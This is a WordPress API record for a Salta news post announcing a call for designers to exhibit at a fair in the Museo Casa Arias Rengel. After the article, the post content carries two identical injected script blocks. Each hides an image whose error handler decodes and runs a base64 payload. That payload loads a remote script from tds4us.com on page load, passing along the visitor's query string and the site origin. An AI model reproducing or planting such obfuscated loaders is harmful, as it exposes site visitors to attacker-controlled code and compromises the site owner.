{"id":4634,"date":"2024-11-29T11:32:26","date_gmt":"2024-11-29T14:32:26","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4634"},"modified":"2025-08-13T23:44:33","modified_gmt":"2025-08-14T02:44:33","slug":"la-feria-de-diseno-en-salta-abre-convocatoria-para-creadores","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4634","title":{"rendered":"La Feria de Dise\u00f1o en Salta abre convocatoria para creadores"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-273c610f77c73efdf29aa4c93c37c19c\" style=\"background-color:#5e0439\"><em>Dise\u00f1adores de Salta podr\u00e1n participar en la Feria de Dise\u00f1o, que se desarrollar\u00e1 del 14 de diciembre al 5 de enero en el Museo Casa Arias Rengel.<\/em><\/h4>\n\n\n\n<p>La Secretar\u00eda de Cultura&nbsp;invita a dise\u00f1adoras y dise\u00f1adores locales a participar de la Feria de Dise\u00f1o, un evento que busca exhibir y comercializar objetos, iluminaci\u00f3n, mobiliario, accesorios, indumentaria, calzado y juguetes. La Feria tendr\u00e1 lugar del 14 de diciembre de 2024 al 5 de enero de 2025 en la planta baja del Museo Casa Arias Rengel, ubicado en la peatonal La Florida N\u00ba 20, en el coraz\u00f3n de la ciudad de Salta.<\/p>\n\n\n\n<p>Las personas interesadas deber\u00e1n inscribirse antes del mi\u00e9rcoles 4 de diciembre completando el Formulario de inscripci\u00f3n disponible en l\u00ednea. La selecci\u00f3n de las propuestas ser\u00e1 realizada el 5 y 6 de diciembre por un jurado compuesto por Claudia Lamas, Subsecretaria de Patrimonio Cultural; Mar\u00eda Jos\u00e9 Fascio, Coordinadora General de la Secretar\u00eda de Cultura&nbsp;y Romina Postigo Zafaranich, artista visual y dise\u00f1adora. Los resultados se publicar\u00e1n el 6 de diciembre en culturasalta.gov.ar.<\/p>\n\n\n\n<p>Entre los criterios de evaluaci\u00f3n destacan la originalidad, la creatividad est\u00e9tica y funcional, el acabado prolijo y el uso ecoeficiente de los recursos. La participaci\u00f3n ser\u00e1 gratuita y se ofrecer\u00e1 un espacio aproximado de 2.50 m\u00b2, con iluminaci\u00f3n, seguridad, wifi, dep\u00f3sito y un sal\u00f3n para talleres o charlas en el primer piso. Sin embargo, los participantes deber\u00e1n proveer sus propios elementos de exhibici\u00f3n como mesas, percheros o repisas.<\/p>\n\n\n\n<p>La Feria funcionar\u00e1 en los mismos horarios del Museo, de martes a domingos de 10 a 20 horas. Este evento promete ser una plataforma \u00fanica para mostrar la riqueza creativa de los dise\u00f1adores locales y conectar con el p\u00fablico durante las festividades de fin de a\u00f1o.<\/p>\n\n\n\n<p>FORMULARIO DE INSCRIPCION:&nbsp;<a href=\"https:\/\/forms.gle\/qeBneSU1FdXAnK74A\">https:\/\/forms.gle\/qeBneSU1FdXAnK74A<\/a><\/p>\n\n\n\n<p>Para m\u00e1s informaci\u00f3n, los interesados pueden comunicarse al correo: sector.diseno@culturasalta.gov.ar.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Dise\u00f1adores de Salta podr\u00e1n participar en la Feria de Dise\u00f1o, que se desarrollar\u00e1 del 14 de diciembre al 5 de enero en el Museo Casa Arias Rengel. La Secretar\u00eda de Cultura&nbsp;invita a dise\u00f1adoras y dise\u00f1adores locales a participar de la Feria de Dise\u00f1o, un evento que busca exhibir y comercializar objetos, iluminaci\u00f3n, mobiliario, accesorios, indumentaria, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4635,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9,17],"tags":[],"class_list":{"0":"post-4634","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4634"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4634"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4634\/revisions"}],"predecessor-version":[{"id":6625,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4634\/revisions\/6625"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4635"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4634"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4634"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4634"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}